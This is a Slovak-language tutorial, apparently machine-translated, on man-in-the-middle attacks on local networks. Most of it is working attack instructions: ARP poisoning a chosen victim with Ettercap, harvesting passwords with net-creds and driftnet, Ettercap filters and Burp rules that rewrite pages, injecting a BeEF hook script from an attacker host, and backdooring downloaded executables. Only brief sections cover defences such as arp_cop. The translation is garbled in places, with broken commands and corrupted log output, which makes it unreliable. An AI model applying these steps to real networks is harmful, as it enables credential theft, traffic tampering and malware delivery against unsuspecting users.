Hackeri ho používajú na presmerovanie prevádzky. Metódy hackerských útokov. Falšovanie údajov pomocou Burp

Metódy na zachytenie sieťovej prevádzky

Počúvanie siete pomocou programov na analyzovanie siete je prvé, najčastejšie jednoduchým spôsobom odpočúvanie údajov.

Na ochranu pred odpočúvaním siete použite špeciálne programy, napríklad AntiSniff, ktoré sú schopné identifikovať počítače v sieti, ktoré počúvajú sieťovú prevádzku.

Na vyriešenie svojich problémov používajú antisniffer programy špeciálny znak prítomnosti odpočúvacích zariadení v sieti - sieťová karta počítača sniffer musí byť v špeciálnom režime počúvania. V režime počúvania reagujú sieťové počítače špeciálnym spôsobom na IP datagramy odoslané testovanému hostiteľovi. Napríklad počúvajúci hostitelia zvyčajne spracovávajú všetku prichádzajúcu komunikáciu, nielen datagramy odoslané na adresu hostiteľa. Existujú ďalšie znaky, ktoré naznačujú podozrivé správanie hostiteľa, ktoré AntiSniff dokáže rozpoznať.

Odpočúvanie je nepochybne veľmi užitočné z pohľadu útočníka, pretože umožňuje získať množstvo užitočných informácií – heslá prenášané cez sieť, adresy sieťových počítačov, dôverné údaje, listy atď. Jednoduché odpočúvanie však hackerovi neumožňuje zasahovať do sieťovej komunikácie medzi dvoma hostiteľmi s cieľom upraviť a poškodiť údaje. Na vyriešenie takéhoto problému je potrebná komplexnejšia technológia.

Na zachytenie a prevzatie procesu sieťovej interakcie medzi dvoma hostiteľmi A a B môže útočník nahradiť IP adresy interagujúcich hostiteľov svojou vlastnou IP adresou odoslaním falošných správ ARP (Address Resolution Protocol) hostiteľom A a B.

Ryža. 1 Falošné požiadavky ARP

Pozrime sa, ako môže hacker použiť ARP na zachytenie sieťovej komunikácie medzi hostiteľmi A a B.

Na zachytenie sieťovej prevádzky medzi hostiteľmi A a B hacker vnúti týmto hostiteľom svoju IP adresu, aby A a B použili túto sfalšovanú IP adresu pri výmene správ. Na uloženie svojej IP adresy hacker vykoná nasledujúce operácie.

  • Útočník zisťuje MAC adresy hostiteľov A a B napríklad pomocou príkazu nbtstat z balíka W2RK.
  • Útočník posiela na identifikované MAC adresy hostiteľov A a B správy, ktoré sú sfalšovanými odpoveďami ARP na žiadosti o rozlíšenie IP adries hostiteľov na MAC adresy počítačov. Hostiteľ A je informovaný, že IP adresa hostiteľa B zodpovedá MAC adrese počítača útočníka; hostiteľ B je informovaný, že IP adresa hostiteľa A tiež zodpovedá MAC adrese počítača útočníka.
  • Hostitelia A a B ukladajú prijaté MAC adresy do svojich vyrovnávacích pamätí ARP a potom ich používajú na vzájomné posielanie správ. Keďže IP adresy A a B zodpovedajú MAC adrese útočníkovho počítača, hostitelia A a B, nič netušiace, komunikujú cez sprostredkovateľa, ktorý môže s ich správami robiť čokoľvek.

Na ochranu pred takýmito útokmi musia správcovia siete udržiavať databázu s tabuľkou zhody medzi MAC adresami a IP adresami ich počítačov v sieti.

V sieťach UNIX možno tento typ útoku s falošnou požiadavkou ARP implementovať pomocou systémových nástrojov na monitorovanie a správu sieťovej prevádzky, napríklad arpredirect. Bohužiaľ sa nezdá, že by takéto spoľahlivé nástroje boli implementované v sieťach Windows. Napríklad na webovej stránke NTsecurity si môžete stiahnuť pomôcku GrabitAII, ktorá je prezentovaná ako nástroj na presmerovanie prevádzky medzi sieťovými hostiteľmi. Základná kontrola funkčnosti utility GrabitAII však ukazuje, že k úplnému úspechu pri implementácii jej funkcií je ešte ďaleko.

Na zachytenie sieťovej prevádzky môže útočník sfalšovať skutočnú IP adresu sieťového smerovača svojou vlastnou IP adresou, a to napríklad pomocou sfalšovaných správ ICMP Redirect. Hostiteľ A musí podľa RFC-1122 vnímať prijatú Redirect správu ako odpoveď na datagram odoslaný inému hostiteľovi, napríklad B. Hostiteľ A určuje svoje akcie na Redirect správe na základe obsahu prijatej Redirect správy, a ak je v Redirect from A to B po novej trase špecifikované presmerovanie datagramu, bude to presne to, čo hostiteľ A urobí.

Ryža. 2 Nesprávne smerovanie

Na vykonanie falošného smerovania musí útočník poznať niektoré podrobnosti o organizácii lokálna sieť, v ktorom sa nachádza hostiteľ A, najmä IP adresa smerovača, cez ktorý sa odosiela prevádzka z hostiteľa A na B. Útočník s týmto vedomím vygeneruje IP datagram, v ktorom je IP adresa odosielateľa definovaná ako IP smerovača. adresa a príjemcom je špecifikovaný hostiteľ A. Datagram obsahuje aj správu ICMP Redirect s adresou nového smerovača nastavenou na IP adresu počítača útočníka. Po prijatí takejto správy hostiteľ A pošle všetky správy na IP adresu počítača útočníka.

Na ochranu pred takýmto útokom by ste mali zakázať (napríklad pomocou brány firewall) spracovanie správ ICMP Redirect na hostiteľovi A a príkaz tracert (v Unixe je to príkaz tracerout) môže odhaliť IP adresu počítača útočníka. . Tieto nástroje sú schopné nájsť ďalšiu cestu, ktorá sa objavila v lokálnej sieti a ktorá nebola poskytnutá počas inštalácie, pokiaľ, samozrejme, správca siete nie je ostražitý.

Vyššie uvedené príklady odpočúvania (na ktoré sa možnosti útočníkov zďaleka neobmedzujú) nás presviedčajú o potrebe chrániť dáta prenášané cez sieť, ak dáta obsahujú dôverné informácie. Jediným spôsobom ochrany pred zachytením sieťovej prevádzky je použitie programov, ktoré implementujú kryptografické algoritmy a šifrovacie protokoly a zabraňujú prezradeniu a nahradeniu tajných informácií. Na vyriešenie takýchto problémov poskytuje kryptografia prostriedky na šifrovanie, podpisovanie a overovanie pravosti správ prenášaných cez zabezpečené protokoly.

Praktickú implementáciu všetkých kryptografických metód na ochranu výmeny informácií zabezpečuje VPN siete(Virtual Private Network – Virtuálne privátne siete).

Zachytenie spojenia TCP

Najsofistikovanejší útok na zachytenie sieťovej prevádzky by sa mal považovať za zachytávanie spojenia TCP (TCP hijacking), keď hacker preruší aktuálnu komunikačnú reláciu s hostiteľom generovaním a odosielaním paketov TCP napadnutému hostiteľovi. Potom pomocou schopnosti protokolu TCP obnoviť prerušené pripojenie TCP hacker zachytí prerušenú komunikačnú reláciu a pokračuje v nej namiesto odpojeného klienta.

Bolo vytvorených niekoľko účinných utilít na vykonávanie útokov na zneškodnenie TCP spojenia, ale všetky sú implementované pre platformu Unix a na webových stránkach sú tieto utilitky prezentované len vo forme zdrojového kódu. Útoky na zneškodnenie pripojenia TCP sú teda málo užitočné.

Protokol TCP (Transmission Control Protocol) patrí medzi základné transportné protokoly. úroveň OSI, ktorý vám umožňuje vytvárať logické spojenia cez virtuálny komunikačný kanál. Cez tento kanál sa vysielajú a prijímajú pakety so zaznamenanou ich sekvenciou, riadi sa tok paketov, organizuje sa opakovaný prenos skreslených paketov a na konci relácie sa preruší komunikačný kanál. TCP je jediný protokol základný protokol z rodiny TCP/IP, ktorá má pokročilý systém identifikácie správ a pripojenia.

Prehľad snifferov softvérových paketov

Všetky softvérové ​​sniffery možno rozdeliť do dvoch kategórií: sniffery, ktoré podporujú spúšťanie z príkazový riadok, a sniffers s grafickým rozhraním. Upozorňujeme však, že existujú sniffery, ktoré kombinujú obe tieto schopnosti. Okrem toho sa snifferi navzájom líšia protokolmi, ktoré podporujú, hĺbkou analýzy zachytených paketov, schopnosťou konfigurovať filtre a možnosťou kompatibility s inými programami.

Obyčajne okno každého sniffera s grafické rozhranie pozostáva z troch oblastí. Prvý z nich zobrazuje súhrnné údaje zachytených paketov. Táto oblasť zvyčajne zobrazuje minimum polí, konkrétne: čas zachytenia paketu; IP adresy odosielateľa a príjemcu paketu; MAC adresy odosielateľa a príjemcu paketu, adresy zdrojového a cieľového portu; typ protokolu (sieťová, transportná alebo aplikačná vrstva); nejaké súhrnné informácie o zachytených údajoch. Druhá oblasť zobrazuje štatistické informácie o jednotlivom vybranom balíku a nakoniec tretia oblasť zobrazuje balík v hexadecimálnej forme alebo vo forme znakov ASCII.

Takmer všetky čítačky paketov vám umožňujú analyzovať dekódované pakety (preto sa čítačky paketov nazývajú aj paketové analyzátory alebo analyzátory protokolov). Sniffer distribuuje zachytené pakety cez vrstvy a protokoly. Niektoré sledovače paketov sú schopné rozpoznať protokol a zobraziť zachytené informácie. Tento typ informácií sa zvyčajne zobrazuje v druhej oblasti okna snímania. Napríklad každý sniffer dokáže rozpoznať protokol TCP a pokročilí snifferi môžu určiť, ktorá aplikácia generovala tento prenos. Väčšina analyzátorov protokolov rozpoznáva viac ako 500 rôznych protokolov a dokáže ich opísať a dekódovať podľa názvu. Čím viac informácií dokáže sniffer dekódovať a zobraziť na obrazovke, tým menej ich bude musieť dekódovať manuálne.

Jedným problémom, s ktorým sa môžu snifferi paketov stretnúť, je neschopnosť správne identifikovať protokol pomocou iného než predvoleného portu. Napríklad na zlepšenie zabezpečenia môžu byť niektoré známe aplikácie nakonfigurované na používanie iných portov, než sú predvolené porty. Takže namiesto tradičného portu 80 vyhradeného pre webový server, tento server Môžete ho násilne prekonfigurovať na port 8088 alebo akýkoľvek iný. Niektoré analyzátory paketov v tejto situácii nedokážu správne určiť protokol a zobrazia len informácie o protokole nižšej úrovne (TCP alebo UDP).

Existujú softvérové ​​sniffery, ktoré sa dodávajú so softvérovými analytickými modulmi ako zásuvné moduly alebo vstavané moduly, ktoré vám umožňujú vytvárať správy s užitočnými analytickými informáciami o zachytenej premávke.

Ďalšou charakteristickou črtou väčšiny analyzátorov softvérových paketov je schopnosť konfigurovať filtre pred a po zachytení prevádzky. Filtre vyberajú určité pakety zo všeobecnej prevádzky podľa daného kritéria, čo vám umožňuje zbaviť sa nepotrebných informácií pri analýze prevádzky.

Alternatívy k Ettercap

Ettercap je najobľúbenejší softvér na útok typu man-in-the-middle, ale je najlepší? V celej inštrukcii uvidíte, že Ettercap sa takmer nikdy nepoužíva samostatne, že jeden alebo druhý program je vždy zostavený s ním v reťazci spracovania prevádzky. Možno to pridáva flexibilitu; vo všeobecnosti je tento prístup základom UNIX - jeden program vykonáva jednu úlohu a koncový používateľ kombinuje rôzne programy, aby dosiahol požadovaný výsledok. S týmto prístupom sa programový kód ľahšie udržiava, z takýchto miniatúrnych „kociek“ môžete zostaviť systém akejkoľvek zložitosti a flexibility. Mať päť otvorených konzol s rôznymi úlohami, ktorých práca je zameraná na dosiahnutie jedného výsledku, však nie je príliš pohodlné, je to jednoducho komplikovanejšie, v určitej fáze existuje možnosť urobiť chybu a celá je nakonfigurovaná systém bude fungovať márne.

Net-Creds čuchať:

  • Navštívené adresy URL
  • Žiadosti POST boli odoslané
  • prihlasovacie údaje/heslá z formulárov HTTP
  • prihlasovacie údaje/heslá pre základnú HTTP autentifikáciu
  • HTTP vyhľadávania
  • FTP prihlasovacie údaje/heslá
  • IRC prihlasovacie údaje/heslá
  • POP prihlasovacie údaje/heslá
  • IMAP prihlasovacie údaje/heslá
  • Telnet prihlasovacie údaje/heslá
  • SMTP prihlasovacie údaje/heslá
  • SNMP komunitný reťazec
  • všetky podporované protokoly NTLMv1/v2 ako HTTP, SMB, LDAP atď.
  • Kerberos

Dobrý výber zachytených a driftnet je v tomto ohľade jednoduchší – zobrazuje len zachytené obrázky.

Prepnite svoj stroj do režimu preposielania.

Echo "1" > /proc/sys/net/ipv4/ip_forward

Spustite Ettercap s grafickým rozhraním (-G):

Ettercap-G

Teraz vyberte Hostitelia, je tu podpoložka Skenovať hostiteľov. Po dokončení skenovania vyberte zoznam hostiteľov:

Ako Target1 vyberte router (Add to Target 1), ako Target2 zvoľte zariadenie, na ktoré zaútočíte (Add to Target 2).

Tu však môže vzniknúť prvý problém, najmä ak je hostiteľov veľa. V rôznych pokynoch, vrátane vyššie uvedeného videa, sa autori vyšplhajú na cieľový počítač (každý z nejakého dôvodu má Windows) a pomocou príkazu sa pozerajú na IP tohto počítača v lokálnej sieti. Súhlasíte, táto možnosť je pre skutočné podmienky neprijateľná.

Ak skenujete pomocou , môžete nejaké získať Ďalšie informácie o hostiteľoch, presnejšie o výrobcovi sieťovej karty:

Nmap -sn 192.168.1.0/24

Ak údaje stále nie sú dostatočné, môžete vykonať skenovanie a určiť operačný systém:

Nmap -O 192.168.1.0/24

Ako vidíme, stroj s IP 192.168.1.33 sa ukázal ako Windows, ak to nie je znamenie zhora, čo to je? 😉 LOL

Toto pridávame ako druhý cieľ.

Teraz prejdite na položku ponuky Mitm. Tam vyberte Otrávenie ARP... Začiarknite políčko Sniff remote connections.

Začneme žať, v jednom okne spustíme

Net-creds

v inom (oba programy je možné spustiť bez možností)

Driftnet

Zber údajov sa začal okamžite:

Na pravej strane driftnet otvoril ďalšie okno, v ktorom zobrazuje zachytené obrázky. V okne net-cred vidíme navštívené stránky a zachytené heslá:

1.2 Ettercap + Burp Suite
3. Zobrazenie údajov (navštívené stránky a zachytené heslá) v Ettercap

V ponuke Zobraziť máme prístup k záložkám Pripojenia a Profily. Môžete tiež začiarknuť políčko Vyriešiť adresy IP. Spojenia sú, samozrejme, spojenia. Ettercap zhromažďuje profily v pamäti pre každého hostiteľa, ktorého objaví. Zhromažďujú sa tam používatelia a heslá. V tomto prípade sú profily so zachytenými údajmi o účte (heslá) označené krížikom:

Netreba sa príliš spoliehať na profily – označené sú napríklad zachytené prihlasovacie mená a heslá k FTP a iným službám, pri ktorých program dokáže prijaté informácie jednoznačne interpretovať ako prihlasovacie údaje. Nepatria sem napríklad základné autentifikačné údaje, prihlasovacie mená a heslá zadávané do webových formulárov.

V Connections sú najsľubnejšie údaje označené hviezdičkou:

Dvojitým kliknutím na tieto položky zobrazíte podrobnosti:

Aby ste tieto hviezdy nehľadali v celom zozname, môžete ich zoradiť podľa tohto poľa a všetky sa zobrazia hore alebo dole:

Zachytené základné overenie:

Prihlasovacie heslo pre Yandex (zvýraznené nižšie):

Toto sú zachytené poverenia pre VKontakte:

Najzaujímavejšie údaje sa zhromažďujú aj v dolnej konzole:

Ak chcete uložiť výsledky programu, použite tieto možnosti (pri spustení Ettercap zadajte klávesy:

Možnosti protokolovania: -w, --zapisovanie zachytených údajov do súboru pcapfile -L, --log zapisovanie celej návštevnosti do tohto súboru -l, --log-info zapisovanie iba pasívnych informácií do tohto súboru -m, --log-msg zapisovanie všetkých správ v tomto -c, --compress použije kompresiu gzip pre protokolové súbory

4. Priebežná náhrada údajov v Ettercap
4.1 Používanie vlastných filtrov Ettercap

Poznámka: Napriek všetkému testovaniu mi filtre Ettercap stále nefungovali. Je ťažké pochopiť, či je to záležitosť rúk, hardvérových funkcií alebo chyby v samotnom programe... Ale pre verziu 0.8.2 (aktuálne najnovšiu) existuje hlásenie o problémoch s filtrami. Vo všeobecnosti, súdiac podľa hlásení chýb a fór, filtre buď často vypadávajú, alebo už dlhú dobu nefungujú vôbec. Existuje pobočka, kde sa pred 5 mesiacmi robili zmeny https://github.com/Ettercap/ettercap/tree/filter-improvements, t.j. vylepšenia filtrov (s vylepšeniami filtrov). Ako pre túto vetvu, tak aj pre verziu z úložiska bola vykonaná široká škála testov, testovali sa rôzne filtre za rôznych podmienok, strávilo sa veľa času, ale bez výsledku. Mimochodom, ak chcete nainštalovať verziu vylepšenia filtra v systéme Kali Linux, musíte urobiť toto:

Sudo apt-get remove ettercap-graphical ettercap-common sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev-dev libdev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir_ENDOABLE build cd =On ../ make sudo make install

Vo všeobecnosti, ak vaše filtre nefungujú, nie ste sami. V návode o Ettercap nemôžem preskočiť tému filtrov, takže o nich bude v každom prípade reč.

Doteraz sme na spoofing ARP používali Ettercap. Toto je veľmi povrchná aplikácia. Vďaka vlastným filtrom môžeme zasahovať a meniť premávku za chodu. Filtre musia byť obsiahnuté v samostatných súboroch a pred použitím musia byť skompilované pomocou programu Etterfilter. Hoci sa dokumentácia, na ktorú je uvedený odkaz, zdá skromná, ale v spojení s príkladmi uvedenými nižšie vám umožní písať celkom zaujímavé filtre.

Vytvorme náš prvý filter, ktorý nahradí všetky obrázky týmto:

V súbore s názvom img_replacer.filter copy:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) ( replace("Accept-Encoding", "Accept-Rubbish!"); # poznámka: náhradný reťazec má rovnakú dĺžku ako pôvodný msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); nahradiť("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); nahradiť("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); nahradiť("SRC =", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); )

Kompilujte súbor:

Etterfilter img_replacer.filter -o img_replacer.ef

Výsledky kompilácie:

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team Načítaných 14 tabuliek protokolov: DEKODOVANÉ ÚDAJE udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth Načítaných 13 konštánt: VRRP OSPF GRE UDP TCP ESP Parsing zdrojový súbor IPPP ICMP6 IPPPE IPPO ICMP "img_replacer.filter" hotovo. Rozbalenie meta-stromu hotovo. Prevod štítkov na skutočné posuny je hotový. Zápis výstupu do "img_replacer.ef" je hotový. -> Skript zakódovaný do 18 inštrukcií.

Prepínač -F hovorí programu, aby načítal filter zo súboru, ktorý nasleduje za prepínačom. Po kompilácii je názov nášho nového súboru s filtrom img_replacer.ef, takže príkaz má tvar:

Ettercap -G -F img_replacer.ef

Poznámka: Keď monitorujete webovú prevádzku, pakety, ktoré vidíte, môžu byť v zašifrovanej forme. Pre efektívnu prácu filtre, Ettercap potrebuje návštevnosť vo formulári obyčajný text. Podľa niektorých pozorovaní je typ kódovania, ktorý webové stránky používajú, "Accept-Encoding: gzip, deflate"

Nižšie je uvedený filter, ktorý prepíše kódovanie a vynúti komunikáciu vo forme obyčajného textu:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) ( replace("gzip", " "); # poznámka: štyri medzery v nahradenom reťazci msg ("vybielený gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( nahradiť("deflate", " "); # poznámka: sedem medzier v nahradenom riadku msg("vybielené deflate\n"); ) )

Syntax na písanie filtrov je podrobne opísaná a potom je tu niekoľko ďalších príkladov:

# nahradenie textu v pakete: if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter bežal"); ) # show správa , ak port tcp je 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("paket SSH\n"); ) ) # zapisat celú komunikáciu cez telnet tiež spustite ./program pre každý paket if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./ logfile.log "); exec("./program"); ​​​​) ) # zaznamenať všetku komunikáciu okrem http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( protokol (DATA.data , "./logfile.log"); ) # niektoré operácie s užitočným zaťažením paketu if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = " upravené"; DATA .data + 20 = 0x4445; ) # zahodiť všetky pakety obsahujúce "ettercap" if (search(DECODED.data, "ettercap")) ( msg("niekto o nás hovorí...\n") ; drop( ); kill(); ) # záznam dešifrovaných ssh paketov zodpovedajúcich regulárnemu výrazu if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # zabíjanie paketov if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Náhrada údajov pomocou Burp

Ettercap a Burp spustíme podľa popisu v odseku 1.2 alebo v odseku 2.2.

V Burp prejdite na Proxy -> Možnosti. Nájdeme tam Match and Replace. Kliknutím na Pridať pridajte nové pravidlo.

  • Hlavička požiadavky je hlavička požiadavky
  • Telo žiadosti - telo žiadosti
  • Hlavička odpovede - hlavička odpovede
  • Response body - telo odpovede
  • Názov parametra požiadavky – Názov parametra požiadavky
  • Request param value – Request parameter value
  • Prvý riadok požiadavky – Prvý riadok požiadavky

Ak potrebujete zmeniť dáta prenášané metódou GET, tak to platí pre hlavičky.

V značke HTML existuje aj taká vec, ako je hlava (značka hlavy). Vyššie spomenuté nemajú s týmto titulom nič spoločné. O niečo vyššie hovoríme o hlavičkách paketov. Ak chcete zmeniť obsah HTML stránky, potom by ste mali vždy vybrať Telo odpovede namiesto Hlavičky požiadavky, aj keď sa chystáte zmeniť obsah značky head (napríklad názov).

Ak nie ste oboznámení s regulárne výrazy, potom sa v zásade nie je čoho obávať: HTML veľa odpúšťa a čomu nerozumie, jednoducho ignoruje - môžete to použiť. Ak vieš používať regulárne výrazy, tak ťa rešpektujem.)))

Vytvorme napríklad nové pravidlo, ktoré zmení hlavičku požiadavky na telo odpovede. V samotnom pravidle sa zmeníme

.*

Bez nadpisu

Začiarknite políčko zhoda regulárneho výrazu.

Teraz na všetkých stránkach (bez HTTPS) bude názov Bez názvu:

Za značku body vložte ľubovoľný riadok (bude to prvý riadok v texte). Hlavička požiadavky sa zmení na telo odpovede. meníme sa

Začiarknite políčko zhoda regulárneho výrazu.

V pravom hornom rohu (v závislosti od rozloženia) sa zobrazí nápis „Som v pohode!“. Môžete vložiť CSS, JavaScript kód, akýkoľvek text - čokoľvek. Vo všeobecnosti môžete zo stránky odstrániť všetko a potom ju naplniť vlastným obsahom - všetko závisí od vašej fantázie.

Cieľom bolo mierne upraviť každý formulár tak, aby sa údaje odosielali na pôvodný server a na server útočníka (pre každý formulár implementujte viacnásobné odoslanie). Ale keď si zdôvodníme, že ak prenášané dáta nie sú zašifrované a máme k nim prístup, tak ich už vidíme, nie je potrebné ich posielať na žiadny server. Ak však niekto potrebuje skutočne fungujúci príklad odosielania dát z jedného formulára na viacero serverov naraz.

5. Pripojenie na BeEF

Aby sme mohli začať využívať možnosti BeEF, musíme do kódu HTML vložiť súbor JavaScript, zvyčajne riadok ako:

Nasledujúce dva spôsoby sa líšia iba spôsobom vloženia tohto reťazca.

5.1 Pripojenie BeEF pomocou filtrov Ettercap

[časť bude pripravená neskôr]

5.2 Pripojenie BeEF s Burp

Musíte začať presne tak, ako je napísané v odseku 4.2. Iba namiesto nahradenia hlavičiek a pridávania textu na stránku implementujeme kód JavaScript vo forme riadku:

V mojom prípade je tento súbor dostupný na IP 192.168.1.36 na porte 3000. Súbor sa volá hook.js (dá sa zmeniť v nastaveniach). Tie. v mojom prípade potrebujem vstreknúť linku:

Dá sa to urobiť napríklad vytvorením nového pravidla, zmenou hlavičky požiadavky na telo odpovede. K nahradeniu musí dôjsť v samotnom HTML kóde

Skvelé, keď otvoríte akúkoľvek webovú stránku, ktorá nemá HTTPS, do kódu HTML sa vloží kód JavaScript, ktorý vám umožní zhromažďovať informácie prostredníctvom hákového prehliadača a vykonávať rôzne útoky:

6. Infekcia zadnými vrátkami

Spustiteľné súbory môžete nahradiť a infikovať pomocou filtrov Ettercap [ktoré z nejakého dôvodu už nefungujú] a pomocou aplikácie tretích strán. Napríklad BDFProxy to môže robiť za behu. Bohužiaľ, BDFProxy sa stále vznáša z aktualizácie Backdoor Factory z apríla 2016: balík libmproxy bol v Pythone premenovaný na mitmproxy. Pre BDFProxy je balík libmproxy nevyhnutnou závislosťou, bez tohto balíka sa program nespustí. Preto teraz, pred „opravou“ BDFProxy, nie je možné ho použiť, pretože aj s nainštalovaným Backdoor Factory sa program BDFProxy sťažuje na absenciu knižnice libmproxy...

Podobnú operáciu je možné vykonať s Burp Suite. Uvádza sa algoritmus krok za krokom, nemá zmysel ho znova prepisovať v tejto časti.

7. Používanie zásuvných modulov Ettercap

Informácie o zásuvných moduloch Ettercap nájdete. Pluginov je pomerne veľa, tie popísané nižšie sa mi zdajú najzaujímavejšie.

Pluginy je možné pripojiť pri spustení Ettercap, existuje možnosť:

P, -- plugin to spustí

Pluginy je možné načítať aj z GUI:

[MATERIÁL V PRÍPRAVE]

7.1 arp_cop

Hlási podozrivú aktivitu ARP pasívnym monitorovaním požiadaviek/odpovedí ARP. Môže hlásiť pokusy o otravu ARP alebo jednoduché konflikty IP alebo zmeny IP. Ak vytvárate počiatočný zoznam hostiteľov, doplnok bude fungovať presnejšie.

Ettercap -TQP arp_cop //

Príklad skutočnej detekcie spoofingu ARP:

Rozbaliť

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // heslo pre mial: ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Počúvanie: eth0 -> 08:00:27:A3:08:4A 192.36/. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL pitva potrebuje platný skript "redir_command_on" v súbore etter.conf Oprávnenia klesli na EUID 65534 EGID 65534... 33 monitorovaných modulov dissectors 5 mac portov odtlačok prsta dodávateľa 1766 tcp odtlačok OS 2182 známych služieb Náhodne 255 hostiteľov na skenovanie... Skenovanie celej masky siete pre 255 hostiteľov... * |====================== =============================>

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // heslo pre mial: ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Počúvanie: eth0 -> 08:00:27:A3:08:4A 192.36/. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL pitva potrebuje platný skript "redir_command_on" v súbore etter.conf Oprávnenia klesli na EUID 65534 EGID 65534... 33 monitorovaných modulov dissectors 5 mac portov odtlačok prsta dodávateľa 1766 tcp odtlačok OS 2182 známych služieb Náhodne 255 hostiteľov na skenovanie... Skenovanie celej masky siete pre 255 hostiteľov... * |====================== =============================>| 100,00 % 3 hostitelia pridaní do zoznamu hostiteľov... Spúšťa sa zjednotené snímanie... Len text Rozhranie aktivované... Stlačením „h“ zobrazíte pomoc v riadku Aktivuje sa doplnok arp_cop... arp_cop: spustený doplnok... arp_cop: (nový hostiteľ ) 192.168.1.1 arp_cop: (VAROVANIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (UPOZORNENIE) 192.168.1.35 predstiera, že je 192.168.1.1 s91 arp3151.6 2.168.1.1 arp_cop: ( WARNING ) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (UPOZORNENIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (WARNING) 192.168.cop.2 a1.35. ING) 192.168.1.35 predstiera byť 192.168 .1.1 arp_cop: (UPOZORNENIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (UPOZORNENIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_91.61. 2.1 68.1.1 arp_cop: ( VAROVANIE) 192.168 .1.35 predstiera, že je 192.168.1.1 arp_cop: (VAROVANIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (VAROVANIE) 192.168.cop.2 a1WArp.65 ) 192,1 68,1,35 predstiera byť 192.168.1.1 arp_cop: (UPOZORNENIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (UPOZORNENIE) 192.168.1.35 predstiera, že je 192.168.1.1 be1WARNING)215: (predstierať, že je 192.168.1.1 arp2.315: .168.1. 1 arp_cop: (UPOZORNENIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (VAROVANIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (VAROVANIE) 192.168.1.6 predstiera, že1 be1.1.35.cop. 192.168.1.3 5 predstiera byť 192.168.1.1 arp_cop: (UPOZORNENIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (UPOZORNENIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop.6.61 arp_cop: 2.168.1.1 arp_cop : ( VAROVANIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (UPOZORNENIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (VAROVANIE) 192.168.1.6 predstiera, že1 be1.1.35.cop. 192.168.1.35 predstiera, že je 192. 168.1.1 arp_cop: (VAROVANIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (VAROVANIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (WARNING to 31.9) .1.1 arp_cop: (UPOZORNENIE ) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (UPOZORNENIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (VAROVANIE) 192.168.1.35 arp_8 (VAROVANIE) (WARNING) 192.168.1.35 (UPOZORNENIE) 192.1.6. 